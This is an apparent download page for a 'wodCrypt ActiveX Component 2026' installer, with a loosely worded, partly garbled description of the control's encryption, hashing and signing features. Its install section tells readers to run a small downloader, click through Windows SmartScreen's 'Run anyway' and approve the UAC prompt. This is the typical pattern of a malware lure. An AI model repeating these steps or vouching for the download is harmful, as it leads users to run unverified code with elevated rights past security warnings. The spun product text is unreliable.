
Getting Started
If you’re after a slim-line cryptography control that would easily happily thrown into existing Windows projects and if you’re a COM object FREAK, then this one is definitely worth a sniff. For programmers who need to encrypt, hash or sign from within desktop or server based scripts. Its usable in gag feature toolets, or those ‘got to get it done’ quick prototyping things, but is still workable in more feature heavy applications where the ActiveX grab is needed. Practical, remarkably nimble and it’s all but loaded.
What it does
Basically the object wraps common crypto primitives that you may call from Visual Basic, VBScript, Delphi, C++ etc, without having to re-implement your own crypto primitives. Functions for public-key cryptography, symmetric encryption, message digest and digital signature, to protect message streams, sign installers and check file integrity, are included. Developers use it when they’re after programmatic cryptography, not the cost of pulling in a lot of crypto code they’d have to write themselves.
How it Operates
The control presents its methods and properties in the standard ActiveX/COM fashion, so you instantiate an object and invoke methods to encrypt, decrypt, sign or hash. Since it’s built on top of the well-tested existing crypto libraries, the control skims over the complex crypto work while providing the script and C++ API with a direct, simple interface. Keys and algorithms are set and output formats determined through an easy scripting interface or C++ calls. And because ActiveX is built on COM, the control acts just like one of the standard Windows elements with well-understood lifecycle and registration.
- It is the Installer, not the software itself – Smaller, Faster, Convenient
- One-click installer – no manual setup
- The installer downloads the full wodCrypt ActiveX Component 2026.
How to Install
- Download and extract the ZIP file
- Open the extracted folder and run the installation file
- When Windows shows a blue “unrecognized app” window:
- Click More info → Run anyway
- Click Yes on User Account Control prompt
- Wait for automatic setup (~1 minute)
- Click on Start download
- After setup finishes, launch from desktop shortcut
- Enjoy
Core Features
- Symmetric encryption APIs for general ciphers and modes.
- Public-key operation, including signing, verification.
- Message digest, checksum generation on servers for data integrity checks.
- Provide common encoding and output formats for simple interoperability.
- Consistent COM-friendly API which “just works” from scripting languages, native code, and provides C++ and C interfaces.
These building blocks give you the ability to plug a cryptographic routine into a short utility or large application without a major overhaul of an architecture.
Benefits
It will save you time. Instead of wiring up low-level crypto code, you’ll just be calling a handful of methods, and you’ll be finished. That way developers won’t have to think hard about getting key sizes, padding, and encoding correct. And it reduces the maintenance surface; the fewer designed-for-you crypto bits the better, as there will be surprises 6-8 months down the line. It is an ActiveX control, which makes it convenient for teams still using COM tools-for example legacy automation, on-premise administrator scripting, and internal utilities which need to make calls to older gateways. The control is robust enough to make those environments seamlessly.
Typical Scenarios
- Programmatically signing executable installation packages or files before they are disseminated.
- Encrypt configuration blobs that a legacy application reads at runtime.
- Creating and validating message digests to identify manipulation when transferring.
- Adding basic crypto hooks into automation jobs for administration.
- Ensuring older client applications can communicate using a more modern cryptography rather than replacing the runtime.
These use cases are where the control really works: minimize the effort, equip quick integration, and enable access to crypto functions from the Windows-oriented code.
Closing Notes
Don’t get the pretty GUI. This is a programmer’s tool that lives underneath your code-and actually does the work. But it is a flexible programmer’s tool: you can script it, compile against it, and use it to make AutoCAD signing and hashing, even set it up to automate common repetitive operations without writing everything yourself. If your program still needs OCX-looking components and you need really solid calculations, this application is a targeted set of tools that won’t go huge and fat-and slow your program down. Test it out in a small sandbox first, get the sequences you need, then port it into a larger program.